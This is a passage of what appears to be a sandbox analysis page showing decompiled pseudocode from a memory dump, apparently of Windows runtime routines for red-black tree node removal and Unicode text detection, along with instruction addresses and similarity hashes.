						_t14 = _t161 + 4; // 0x4
						_t177 =  *_t14;
						_t117 = _t177 & 0xfffffffe;
						if(_t178 == _t117) {
							_t117 = _a4;
							 *(_t117 + 4) = _t182;
							if((_t177 & 0x00000001) != 0) {
								_t161 = _a4;
								_t117 = _t182 | 0x00000001;
								 *(_t161 + 4) = _t117;
							} else {
								_t161 = _t117;
							}
						} else {
							_t161 = _a4;
						}
					}
					if(( *(_t178 + 8) & 0x00000001) == 0) {
						L42:
						L43:
						return _t117;
					} else {
						_t19 = _t161 + 4; // 0x4
						_t165 =  *_t19 & 0x00000001;
						do {
							_t211 =  *(_t178 + 8) & 0xfffffffc;
							if(_t165 != 0) {
								if(_t211 != 0) {
									_t211 = _t211 ^ _t178;
								}
							}
							_t119 =  *_t211;
							if(_t165 != 0) {
								if(_t119 != 0) {
									_t119 = _t119 ^ _t211;
								}
							}
							_t120 = 0;
							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
							_v8 = _t121;
							_t122 = _t121 ^ 0x00000001;
							_v16 = _t122;
							_t123 =  *(_t211 + _t122 * 4);
							if(_t165 != 0) {
								if(_t123 == 0) {
									goto L20;
								}
								_t123 = _t123 ^ _t211;
								goto L13;
							} else {
								L13:
								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
									L20:
									_t194 = _v16;
									if((_a12 & 0x000000ff) != _v8) {
										_t126 =  *(_t182 + 8) & 0xfffffffc;
										_t167 = _t165 & 1;
										_v12 = _t167;
										if(_t167 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t182;
											}
										}
										if(_t126 != _t178) {
											L83:
											_t178 = 0x1d;
											asm("int 0x29");
											goto L84;
										} else {
											_t126 =  *(_t178 + _t194 * 4);
											if(_t167 != 0) {
												if(_t126 != 0) {
													_t126 = _t126 ^ _t178;
												}
											}
											if(_t126 != _t182) {
												goto L83;
											} else {
												_t126 =  *(_t211 + _v8 * 4);
												if(_t167 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t211;
													}
												}
												if(_t126 != _t178) {
													goto L83;
												} else {
													_t77 = _t178 + 8; // 0x8
													_t150 = _t77;
													_v20 = _t150;
													_t126 =  *_t150 & 0xfffffffc;
													if(_t167 != 0) {
														if(_t126 != 0) {
															_t126 = _t126 ^ _t178;
														}
													}
													if(_t126 != _t211) {
														goto L83;
													} else {
														_t202 = _t211 ^ _t182;
														_t152 = _t202;
														if(_t167 == 0) {
															_t152 = _t182;
														}
														 *(_t211 + _v8 * 4) = _t152;
														_t170 = _v12;
														if(_t170 == 0) {
															_t202 = _t211;
														}
														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
														_t126 =  *(_t182 + _v8 * 4);
														if(_t170 != 0) {
															if(_t126 == 0) {
																L58:
																if(_t170 != 0) {
																	if(_t126 != 0) {
																		_t126 = _t126 ^ _t178;
																	}
																}
																 *(_t178 + _v16 * 4) = _t126;
																_t199 = _t178 ^ _t182;
																if(_t170 != 0) {
																	_t178 = _t199;
																}
																 *(_t182 + _v8 * 4) = _t178;
																if(_t170 == 0) {
																	_t199 = _t182;
																}
																 *_v20 =  *_v20 & 0x00000003 | _t199;
																_t178 = _t182;
																_t167 =  *((intOrPtr*)(_a4 + 4));
																goto L21;
															}
															_t126 = _t126 ^ _t182;
														}
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t194 = _t167 & 0xfffffffc;
															if(_v12 != 0) {
																L84:
																if(_t194 != 0) {
																	_t194 = _t194 ^ _t126;
																}
															}
															if(_t194 != _t182) {
																goto L83;
															}
															if(_v12 != 0) {
																_t196 = _t126 ^ _t178;
															} else {
																_t196 = _t178;
															}
															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
															_t170 = _v12;
														}
														goto L58;
													}
												}
											}
										}
									}
									L21:
									_t182 = _v8 ^ 0x00000001;
									_t126 =  *(_t178 + 8) & 0xfffffffc;
									_v8 = _t182;
									_t194 = _t167 & 1;
									if(_t194 != 0) {
										if(_t126 != 0) {
											_t126 = _t126 ^ _t178;
										}
									}
									if(_t126 != _t211) {
										goto L83;
									} else {
										_t134 = _t182 ^ 0x00000001;
										_v16 = _t134;
										_t126 =  *(_t211 + _t134 * 4);
										if(_t194 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t211;
											}
										}
										if(_t126 != _t178) {
											goto L83;
										} else {
											_t167 = _t211 + 8;
											_t182 =  *_t167 & 0xfffffffc;
											_v20 = _t167;
											if(_t194 != 0) {
												if(_t182 == 0) {
													L80:
													_t126 = _a4;
													if( *_t126 != _t211) {
														goto L83;
													}
													 *_t126 = _t178;
													L34:
													if(_t194 != 0) {
														if(_t182 != 0) {
															_t182 = _t182 ^ _t178;
														}
													}
													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
													if(_t194 != 0) {
														if(_t139 == 0) {
															goto L37;
														}
														_t126 = _t139 ^ _t178;
														goto L36;
													} else {
														L36:
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t182 = _t167 & 0xfffffffc;
															if(_t194 != 0) {
																if(_t182 != 0) {
																	_t182 = _t182 ^ _t126;
																}
															}
															if(_t182 != _t178) {
																goto L83;
															} else {
																if(_t194 != 0) {
																	_t190 = _t126 ^ _t211;
																} else {
																	_t190 = _t211;
																}
																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
																_t167 = _v20;
																goto L37;
															}
														}
														L37:
														if(_t194 != 0) {
															if(_t139 != 0) {
																_t139 = _t139 ^ _t211;
															}
														}
														 *(_t211 + _v16 * 4) = _t139;
														_t187 = _t211 ^ _t178;
														if(_t194 != 0) {
															_t211 = _t187;
														}
														 *(_t178 + _v8 * 4) = _t211;
														if(_t194 == 0) {
															_t187 = _t178;
														}
														_t143 =  *_t167 & 0x00000003 | _t187;
														 *_t167 = _t143;
														_t117 = _t143 | 0x00000001;
														 *_t167 = _t117;
														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
														goto L42;
													}
												}
												_t182 = _t182 ^ _t211;
											}
											if(_t182 == 0) {
												goto L80;
											}
											_t144 =  *(_t182 + 4);
											if(_t194 != 0) {
												if(_t144 != 0) {
													_t144 = _t144 ^ _t182;
												}
											}
											if(_t144 == _t211) {
												if(_t194 != 0) {
													_t146 = _t182 ^ _t178;
												} else {
													_t146 = _t178;
												}
												 *(_t182 + 4) = _t146;
												goto L34;
											} else {
												_t126 =  *_t182;
												if(_t194 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t182;
													}
												}
												if(_t126 != _t211) {
													goto L83;
												} else {
													if(_t194 != 0) {
														_t148 = _t182 ^ _t178;
													} else {
														_t148 = _t178;
													}
													 *_t182 = _t148;
													goto L34;
												}
											}
										}
									}
								} else {
									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
									_t182 = _t211;
									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
									_t174 = _a4;
									_t117 =  *(_t211 + 8);
									_t181 = _t117 & 0xfffffffc;
									if(( *(_t174 + 4) & 0x00000001) != 0) {
										if(_t181 == 0) {
											goto L42;
										}
										_t178 = _t181 ^ _t211;
									}
									if(_t178 == 0) {
										goto L42;
									}
									goto L17;
								}
							}
							L17:
							 *(_t211 + 8) = _t117 | 0x00000001;
							_t40 = _t174 + 4; // 0x4
							_t117 =  *_t178;
							_t165 =  *_t40 & 0x00000001;
							if(_t165 != 0) {
								if(_t117 != 0) {
									_t117 = _t117 ^ _t178;
								}
							}
							_a12 = _t211 != _t117;
						} while (( *(_t178 + 8) & 0x00000001) != 0);
						goto L42;
					}
				}
			}

0x1e3bb095
0x1e3bb09b
0x1e3bb09f
0x1e3bb0a5
0x1e3bb0a7
0x1e3bb0aa
0x1e3bb0ad
0x1e3bb0b1
0x1e3bb3f8
0x1e3bb3fa
0x1e3bb3ff
0x1e3bb419
0x1e3bb41b
0x1e3bb41b
0x1e3bb401
0x00000000
0x1e3bb0b7
0x1e3bb0b9
0x1e3bb0bc
0x1e3bb0c0
0x1e3bb0c2
0x1e3bb0c2
0x1e3bb0c4
0x1e3bb0c8
0x1e3bb0cf
0x1e3bb0d1
0x1e3bb0d1
0x1e3bb0da
0x1e3bb0dd
0x1e3bb0df
0x1e3bb0df
0x1e3bb0e4
0x1e3bb0e9
0x1e3bb3e2
0x1e3bb3e5
0x1e3bb3eb
0x1e40a676
0x1e40a67b
0x1e40a67d
0x1e3bb3f1
0x1e3bb3f1
0x1e3bb3f1
0x1e3bb0ef
0x1e3bb0ef
0x1e3bb0ef
0x1e3bb0e9
0x1e3bb0f6
0x1e3bb28d
0x1e3bb28e
0x1e3bb293
0x1e3bb0fc
0x1e3bb0fc
0x1e3bb101
0x1e3bb104
0x1e3bb107
0x1e3bb10c
0x1e40a687
0x1e40a68d
0x1e40a68d
0x1e40a687
0x1e3bb112
0x1e3bb116
0x1e40a696
0x1e40a69c
0x1e40a69c
0x1e40a696
0x1e3bb120
0x1e3bb121
0x1e3bb124
0x1e3bb127
0x1e3bb12a
0x1e3bb12d
0x1e3bb132
0x1e40a6a5
0x00000000
0x00000000
0x1e40a6ab
0x00000000
0x1e3bb138
0x1e3bb138
0x1e3bb13a
0x1e3bb193
0x1e3bb197
0x1e3bb19d
0x1e3bb29c
0x1e3bb29f
0x1e3bb2a2
0x1e3bb2a7
0x1e40a6d2
0x1e40a6d8
0x1e40a6d8
0x1e40a6d2
0x1e3bb2af
0x1e3bb420
0x1e3bb422
0x1e3bb423
0x00000000
0x1e3bb2b5
0x1e3bb2b5
0x1e3bb2ba
0x1e40a6e1
0x1e40a6e7
0x1e40a6e7
0x1e40a6e1
0x1e3bb2c2
0x00000000
0x1e3bb2c8
0x1e3bb2cb
0x1e3bb2d0
0x1e40a6f0
0x1e40a6f6
0x1e40a6f6
0x1e40a6f0
0x1e3bb2d8
0x00000000
0x1e3bb2de
0x1e3bb2de
0x1e3bb2de
0x1e3bb2e1
0x1e3bb2e6
0x1e3bb2eb
0x1e40a6ff
0x1e40a705
0x1e40a705
0x1e40a6ff
0x1e3bb2f3
0x00000000
0x1e3bb2f9
0x1e3bb2fb
0x1e3bb2fd
0x1e3bb301
0x1e3bb303
0x1e3bb303
0x1e3bb308
0x1e3bb30b
0x1e3bb310
0x1e3bb312
0x1e3bb312
0x1e3bb31c
0x1e3bb322
0x1e3bb327
0x1e40a70e
0x1e3bb335
0x1e3bb337
0x1e40a71d
0x1e40a723
0x1e40a723
0x1e40a71d
0x1e3bb340
0x1e3bb345
0x1e3bb349
0x1e40a72a
0x1e40a72a
0x1e3bb352
0x1e3bb357
0x1e3bb359
0x1e3bb359
0x1e3bb365
0x1e3bb367
0x1e3bb36c
0x00000000
0x1e3bb36c
0x1e40a714
0x1e40a714
0x1e3bb32f
0x1e3bb3b8
0x1e3bb3bd
0x1e3bb3c4
0x1e3bb425
0x1e3bb427
0x1e3bb429
0x1e3bb429
0x1e3bb427
0x1e3bb3c8
0x00000000
0x00000000
0x1e3bb3ce
0x1e3bb42f
0x1e3bb3d0
0x1e3bb3d0
0x1e3bb3d0
0x1e3bb3d7
0x1e3bb3da
0x1e3bb3da
0x00000000
0x1e3bb32f
0x1e3bb2f3
0x1e3bb2d8
0x1e3bb2c2
0x1e3bb2af
0x1e3bb1a3
0x1e3bb1a9
0x1e3bb1af
0x1e3bb1b2
0x1e3bb1b5
0x1e3bb1b8
0x1e40a733
0x1e40a739
0x1e40a739
0x1e40a733
0x1e3bb1c0
0x00000000
0x1e3bb1c6
0x1e3bb1c8
0x1e3bb1cb
0x1e3bb1ce
0x1e3bb1d3
0x1e40a742
0x1e40a748
0x1e40a748
0x1e40a742
0x1e3bb1db
0x00000000
0x1e3bb1e1
0x1e3bb1e1
0x1e3bb1e6
0x1e3bb1e9
0x1e3bb1ee
0x1e40a751
0x1e3bb409
0x1e3bb409
0x1e3bb40e
0x00000000
0x00000000
0x1e3bb410
0x1e3bb22d
0x1e3bb22f
0x1e40a790
0x1e40a796
0x1e40a796
0x1e40a790
0x1e3bb23d
0x1e3bb243
0x1e3bb248
0x1e40a79f
0x00000000
0x00000000
0x1e40a7a5
0x00000000
0x1e3bb24e
0x1e3bb24e
0x1e3bb250
0x1e3bb374
0x1e3bb379
0x1e3bb37e
0x1e40a7ae
0x1e40a7b4
0x1e40a7b4
0x1e40a7ae
0x1e3bb386
0x00000000
0x1e3bb38c
0x1e3bb38e
0x1e40a7bd
0x1e3bb394
0x1e3bb394
0x1e3bb394
0x1e3bb39b
0x1e3bb39e
0x00000000
0x1e3bb39e
0x1e3bb386
0x1e3bb256
0x1e3bb258
0x1e40a7c6
0x1e40a7cc
0x1e40a7cc
0x1e40a7c6
0x1e3bb261
0x1e3bb266
0x1e3bb26a
0x1e40a7d3
0x1e40a7d3
0x1e3bb273
0x1e3bb278
0x1e3bb27a
0x1e3bb27a
0x1e3bb281
0x1e3bb283
0x1e3bb285
0x1e3bb287
0x1e3bb289
0x00000000
0x1e3bb289
0x1e3bb248
0x1e40a757
0x1e40a757
0x1e3bb1f6
0x00000000
0x00000000
0x1e3bb1fc
0x1e3bb201
0x1e40a760
0x1e40a766
0x1e40a766
0x1e40a760
0x1e3bb209
0x1e3bb3a8
0x1e40a76f
0x1e3bb3ae
0x1e3bb3ae
0x1e3bb3ae
0x1e3bb3b0
0x00000000
0x1e3bb20f
0x1e3bb20f
0x1e3bb213
0x1e40a778
0x1e40a77e
0x1e40a77e
0x1e40a778
0x1e3bb21b
0x00000000
0x1e3bb221
0x1e3bb223
0x1e40a787
0x1e3bb229
0x1e3bb229
0x1e3bb229
0x1e3bb22b
0x00000000
0x1e3bb22b
0x1e3bb21b
0x1e3bb209
0x1e3bb1db
0x1e3bb142
0x1e3bb142
0x1e3bb146
0x1e3bb148
0x1e3bb14c
0x1e3bb14f
0x1e3bb154
0x1e3bb15b
0x1e40a6b4
0x00000000
0x00000000
0x1e40a6ba
0x1e40a6ba
0x1e3bb163
0x00000000
0x00000000
0x00000000
0x1e3bb163
0x1e3bb13a
0x1e3bb169
0x1e3bb16b
0x1e3bb16e
0x1e3bb171
0x1e3bb175
0x1e3bb178
0x1e40a6c3
0x1e40a6c9
0x1e40a6c9
0x1e40a6c3
0x1e3bb180
0x1e3bb184
0x00000000
0x1e3bb104
0x1e3bb0f6

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
Instruction ID: 3d3406fa12316aec2a88ec7b17b061fa57fdf5567aa246c6c0c3ffefdab9945a
Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
Instruction Fuzzy Hash: 1FD1F231B202468BC729CE2AC49025AB7A6AF85354F298779DC9BCFB49EF31D8419750

Uniqueness

Uniqueness Score: -1.00%

Function 1E3A0D20, Relevance: .4, Instructions: 372
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E1E3A0D20(signed short* _a4, signed char _a8, unsigned int _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _t159;
				unsigned int _t160;
				signed int _t162;
				unsigned int _t163;
				signed int _t180;
				signed int _t192;
				signed int _t193;
				unsigned int _t194;
				signed char _t196;
				signed int _t197;
				signed char _t198;
				signed char _t199;
				unsigned int _t200;
				unsigned int _t202;
				unsigned int _t204;
				unsigned int _t205;
				unsigned int _t209;
				signed int _t210;
				signed int _t211;
				unsigned int _t212;
				signed char _t213;
				signed short* _t214;
				intOrPtr _t215;
				signed int _t216;
				signed int _t217;
				unsigned int _t218;
				signed int _t220;
				signed int _t221;
				signed short _t223;
				signed char _t224;
				signed int _t229;
				signed int _t231;
				unsigned int _t233;
				unsigned int _t237;
				signed int _t238;
				unsigned int _t239;
				signed int _t240;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				unsigned int _t258;
				void* _t261;

				_t213 = _a8;
				_t159 = 0;
				_v60 = 0;
				_t237 = _t213 >> 1;
				_t210 = 0;
				_t257 = 0;
				_v56 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v92 = 0;
				_v88 = 0;
				_v76 = 0;
				_v72 = 0;
				_v64 = 0;
				_v68 = 0;
				_v24 = 0;
				_v80 = 0;
				_v84 = 0;
				_v28 = 0;
				_v32 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v100 = _t237;
				if(_t237 > 0x100) {
					_t254 = 0x100;
					_v36 = 0x100;
					L2:
					_t261 = _t213 - 2;
					if(_t261 == 0) {
						_t214 = _a4;
						_t160 =  *_t214 & 0x0000ffff;
						__eflags = _t160;
						if(_t160 == 0) {
							L108:
							_t159 = 0;
							L8:
							_t238 = 0;
							_v96 = 0;
							if(_t254 == 0) {
								L30:
								_v24 = _t159 - 1;
								goto L31;
							} else {
								goto L11;
								L13:
								_t224 = _t223 >> 8;
								_v40 = _t224;
								_t256 = _t224 & 0x000000ff;
								_t196 = _a4[_t238];
								_v5 = _t196;
								_t197 = _t196 & 0x000000ff;
								if(_t197 == 0xd) {
									__eflags = _t257 - 0xa;
									if(_t257 == 0xa) {
										_v12 = _v12 + 1;
									}
								} else {
									if(_t197 == 0xa) {
										__eflags = _t257 - 0xd;
										if(_t257 == 0xd) {
											_v12 = _v12 + 1;
										}
									}
								}
								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
								if(_t256 > _t257) {
									_t229 = _t256;
								} else {
									_t229 = _t257;
								}
								if(_t257 >= _t256) {
									_t257 = _t256;
								}
								_v28 = _v28 + _t229 - _t257;
								_t231 = _t197;
								if(_t197 <= _t210) {
									_t231 = _t210;
								}
								if(_t210 >= _t197) {
									_t210 = _t197;
								}
								_v32 = _v32 + _t231 - _t210;
								_t238 = _v96 + 1;
								_t210 = _t197;
								_t257 = _t256;
								_v96 = _t238;
								if(_t238 < _v36) {
									_t214 = _a4;
									L11:
									_t223 = _t214[_t238] & 0x0000ffff;
									_t193 = _t223 & 0x0000ffff;
									if(_t193 >= 0x900 || _t193 < 0x21) {
										goto L58;
									} else {
										goto L13;
									}
								}
								_t198 = _v5;
								if(_t198 == 0xd) {
									_t199 = _v40;
									__eflags = _t199 - 0xa;
									if(_t199 != 0xa) {
										L27:
										_t233 = _v12;
										L28:
										if(_t199 != 0) {
											__eflags = _t199 - 0x1a;
											if(_t199 == 0x1a) {
												_v12 = _t233 + 1;
											}
											L31:
											_t162 = _a8;
											if(_t162 > 0x200) {
												_t255 = 0x200;
											} else {
												_t255 = _t162;
											}
											_t215 =  *0x1e496d59; // 0x0
											if(_t215 != 0) {
												_t239 = 0;
												__eflags = _t255;
												if(_t255 == 0) {
													goto L34;
												} else {
													goto L119;
												}
												do {
													L119:
													_t192 =  *(_a4 + _t239) & 0x000000ff;
													__eflags =  *((short*)(0x1e496920 + _t192 * 2));
													_t163 = _v20;
													if( *((short*)(0x1e496920 + _t192 * 2)) != 0) {
														_t163 = _t163 + 1;
														_t239 = _t239 + 1;
														__eflags = _t239;
														_v20 = _t163;
													}
													_t239 = _t239 + 1;
													__eflags = _t239 - _t255;
												} while (_t239 < _t255);
												goto L35;
											} else {
												L34:
												_t163 = 0;
												L35:
												_t240 = _v32;
												_t211 = _v28;
												if(_t240 < 0x7f) {
													__eflags = _t211;
													if(_t211 != 0) {
														L37:
														if(_t240 == 0) {
															_v16 = 0x10;
														}
														L38:
														_t258 = _a12;
														if(_t215 != 0) {
															__eflags = _t163;
															if(_t163 == 0) {
																goto L39;
															}
															__eflags = _t258;
															if(_t258 == 0) {
																goto L39;
															}
															__eflags =  *_t258 & 0x00000400;
															if(( *_t258 & 0x00000400) == 0) {
																goto L39;
															}
															_t218 = _v100;
															__eflags = _t218 - 0x100;
															if(_t218 > 0x100) {
																_t218 = 0x100;
															}
															_t220 = (_t218 >> 1) - 1;
															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
																_t221 = _t220 + _t220;
																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
																asm("sbb ecx, ecx");
																_t216 =  ~_t221 + 1;
																__eflags = _t216;
															} else {
																_t216 = 3;
															}
															_v16 = _v16 | 0x00000400;
															_t240 = _v32;
															L40:
															if(_t211 * _t216 < _t240) {
																_v16 = _v16 | 0x00000002;
															}
															_t217 = _v16;
															if(_t240 * _t216 < _t211) {
																_t217 = _t217 | 0x00000020;
															}
															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
																_t217 = _t217 | 0x00000004;
															}
															if(_v64 + _v68 + _v72 + _v76 != 0) {
																_t217 = _t217 | 0x00000040;
															}
															if(_v80 + _v84 + _v88 + _v92 == 0) {
																_t212 = _v12;
																__eflags = _t212;
																if(_t212 == 0) {
																	goto L48;
																}
																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
																	goto L47;
																}
																goto L48;
															} else {
																L47:
																_t217 = _t217 | 0x00000100;
																L48:
																if((_a8 & 0x00000001) != 0) {
																	_t217 = _t217 | 0x00000200;
																}
																if(_v24 != 0) {
																	_t217 = _t217 | 0x00001000;
																}
																_t180 =  *_a4 & 0x0000ffff;
																if(_t180 != 0xfeff) {
																	__eflags = _t180 - 0xfffe;
																	if(_t180 == 0xfffe) {
																		_t217 = _t217 | 0x00000080;
																	}
																} else {
																	_t217 = _t217 | 0x00000008;
																}
																if(_t258 != 0) {
																	 *_t258 =  *_t258 & _t217;
																	_t217 =  *_t258;
																}
																if((_t217 & 0x00000b08) != 8) {
																	__eflags = _t217 & 0x000000f0;
																	if((_t217 & 0x000000f0) != 0) {
																		L84:
																		return 0;
																	}
																	__eflags = _t217 & 0x00000f00;
																	if((_t217 & 0x00000f00) == 0) {
																		__eflags = _t217 & 0x0000f00f;
																		if((_t217 & 0x0000f00f) == 0) {
																			goto L84;
																		}
																		goto L56;
																	}
																	goto L84;
																} else {
																	L56:
																	return 1;
																}
															}
														}
														L39:
														_t216 = 3;
														goto L40;
													}
													_v16 = 1;
													goto L38;
												}
												if(_t211 == 0) {
													goto L38;
												}
												goto L37;
											}
										} else {
											_t159 = _v24;
											goto L30;
										}
									}
									L104:
									_t233 = _v12 + 1;
									_v12 = _t233;
									goto L28;
								}
								_t199 = _v40;
								if(_t198 != 0xa || _t199 != 0xd) {
									goto L27;
								} else {
									goto L104;
								}
								L58:
								__eflags = _t193 - 0x3001;
								if(_t193 < 0x3001) {
									L60:
									__eflags = _t193 - 0xd00;
									if(__eflags > 0) {
										__eflags = _t193 - 0x3000;
										if(__eflags > 0) {
											_t194 = _t193 - 0xfeff;
											__eflags = _t194;
											if(_t194 != 0) {
												_t200 = _t194 - 0xff;
												__eflags = _t200;
												if(_t200 == 0) {
													_v88 = _v88 + 1;
												} else {
													__eflags = _t200 == 1;
													if(_t200 == 1) {
														_v92 = _v92 + 1;
													}
												}
											}
										} else {
											if(__eflags == 0) {
												_v48 = _v48 + 1;
											} else {
												_t202 = _t193 - 0x2000;
												__eflags = _t202;
												if(_t202 == 0) {
													_v68 = _v68 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v76 = _v76 + 1;
										goto L13;
									}
									__eflags = _t193 - 0x20;
									if(__eflags > 0) {
										_t204 = _t193 - 0x900;
										__eflags = _t204;
										if(_t204 == 0) {
											_v64 = _v64 + 1;
										} else {
											_t205 = _t204 - 0x100;
											__eflags = _t205;
											if(_t205 == 0) {
												_v72 = _v72 + 1;
											} else {
												__eflags = _t205 == 0xd;
												if(_t205 == 0xd) {
													_v84 = _v84 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v44 = _v44 + 1;
										goto L13;
									}
									__eflags = _t193 - 0xd;
									if(_t193 > 0xd) {
										goto L13;
									}
									_t84 = _t193 + 0x1e3a1174; // 0x4040400
									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M1E3A1160))) {
										case 0:
											_v80 = _v80 + 1;
											goto L13;
										case 1:
											_v52 = _v52 + 1;
											goto L13;
										case 2:
											_v56 = _v56 + 1;
											goto L13;
										case 3:
											_v60 = _v60 + 1;
											goto L13;
										case 4:
											goto L13;
									}
								}
								__eflags = _t193 - 0xfeff;
								if(_t193 < 0xfeff) {
									goto L13;
								}
								goto L60;
							}
						}
						__eflags = _t160 >> 8;
						if(_t160 >> 8 == 0) {
							L101:
							_t209 = _a12;
							__eflags = _t209;
							if(_t209 != 0) {
								 *_t209 = 5;
							}
							goto L84;
						}
						goto L108;
					}
					if(_t261 <= 0 || _t237 > 0x100) {
						_t214 = _a4;
					} else {
						_t214 = _a4;
						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
							_t254 = _t254 - 1;
							_v36 = _t254;
						}
					}
					goto L8;
				}
				_t254 = _t237;
				_v36 = _t254;
				if(_t254 == 0) {
					goto L101;
				}
				goto L2;
			}

0x1e3a0d2b
0x1e3a0d2e
0x1e3a0d32
0x1e3a0d39
0x1e3a0d3b
0x1e3a0d3d
0x1e3a0d3f
0x1e3a0d46
0x1e3a0d4d
0x1e3a0d54
0x1e3a0d5b
0x1e3a0d62
0x1e3a0d69
0x1e3a0d70
0x1e3a0d77
0x1e3a0d7e
0x1e3a0d85
0x1e3a0d88
0x1e3a0d8b
0x1e3a0d8e
0x1e3a0d91
0x1e3a0d94
0x1e3a0d97
0x1e3a0d9a
0x1e3a0d9d
0x1e3a0da6
0x1e3a10e9
0x1e3a10ee
0x1e3a0db9
0x1e3a0db9
0x1e3a0dbc
0x1e3fe9c7
0x1e3fe9ca
0x1e3fe9cd
0x1e3fe9d0
0x1e3fe9dd
0x1e3fe9dd
0x1e3a0dec
0x1e3a0dec
0x1e3a0dee
0x1e3a0df3
0x1e3a0ebf
0x1e3a0ec0
0x00000000
0x1e3a0df9
0x1e3a0df9
0x1e3a0e1e
0x1e3a0e21
0x1e3a0e24
0x1e3a0e27
0x1e3a0e2a
0x1e3a0e2d
0x1e3a0e30
0x1e3a0e36
0x1e3a1040
0x1e3a1043
0x1e3a1049
0x1e3a1049
0x1e3a0e3c
0x1e3a0e3f
0x1e3a1007
0x1e3a100a
0x1e3a1010
0x1e3a1010
0x1e3a100a
0x1e3a0e3f
0x1e3a0e58
0x1e3a0e5d
0x1e3a1000
0x1e3a0e63
0x1e3a0e63
0x1e3a0e63
0x1e3a0e67
0x1e3a0e69
0x1e3a0e69
0x1e3a0e6d
0x1e3a0e70
0x1e3a0e74
0x1e3a0e76
0x1e3a0e76
0x1e3a0e7a
0x1e3a0e7c
0x1e3a0e7c
0x1e3a0e83
0x1e3a0e86
0x1e3a0e87
0x1e3a0e89
0x1e3a0e8b
0x1e3a0e91
0x1e3a0e00
0x1e3a0e03
0x1e3a0e03
0x1e3a0e07
0x1e3a0e0f
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3a0e0f
0x1e3a0e97
0x1e3a0e9c
0x1e3a113e
0x1e3a1141
0x1e3a1143
0x1e3a0eb1
0x1e3a0eb1
0x1e3a0eb4
0x1e3a0eb6
0x1e3a1110
0x1e3a1112
0x1e3fea25
0x1e3fea25
0x1e3a0ec3
0x1e3a0ec3
0x1e3a0ecb
0x1e3a10fe
0x1e3a0ed1
0x1e3a0ed1
0x1e3a0ed1
0x1e3a0ed3
0x1e3a0edb
0x1e3fea2d
0x1e3fea2f
0x1e3fea31
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3fea37
0x1e3fea37
0x1e3fea3a
0x1e3fea3e
0x1e3fea47
0x1e3fea4a
0x1e3fea4c
0x1e3fea4d
0x1e3fea4d
0x1e3fea4e
0x1e3fea4e
0x1e3fea51
0x1e3fea52
0x1e3fea52
0x00000000
0x1e3a0ee1
0x1e3a0ee1
0x1e3a0ee1
0x1e3a0ee3
0x1e3a0ee3
0x1e3a0ee6
0x1e3a0eec
0x1e3fea5b
0x1e3fea5d
0x1e3a0ef6
0x1e3a0ef8
0x1e3fea6f
0x1e3fea6f
0x1e3a0efe
0x1e3a0efe
0x1e3a0f03
0x1e3fea7b
0x1e3fea7d
0x00000000
0x00000000
0x1e3fea83
0x1e3fea85
0x00000000
0x00000000
0x1e3fea8b
0x1e3fea91
0x00000000
0x00000000
0x1e3fea97
0x1e3fea9a
0x1e3feaa0
0x1e3feaa2
0x1e3feaa2
0x1e3feaae
0x1e3feab3
0x1e3feab6
0x1e3feabf
0x1e3feaca
0x1e3feacd
0x1e3fead1
0x1e3fead1
0x1e3feab8
0x1e3feab8
0x1e3feab8
0x1e3fead2
0x1e3fead9
0x1e3a0f0e
0x1e3a0f15
0x1e3a0f17
0x1e3a0f17
0x1e3a0f1e
0x1e3a0f23
0x1e3feae1
0x1e3feae1
0x1e3a0f38
0x1e3a0f3a
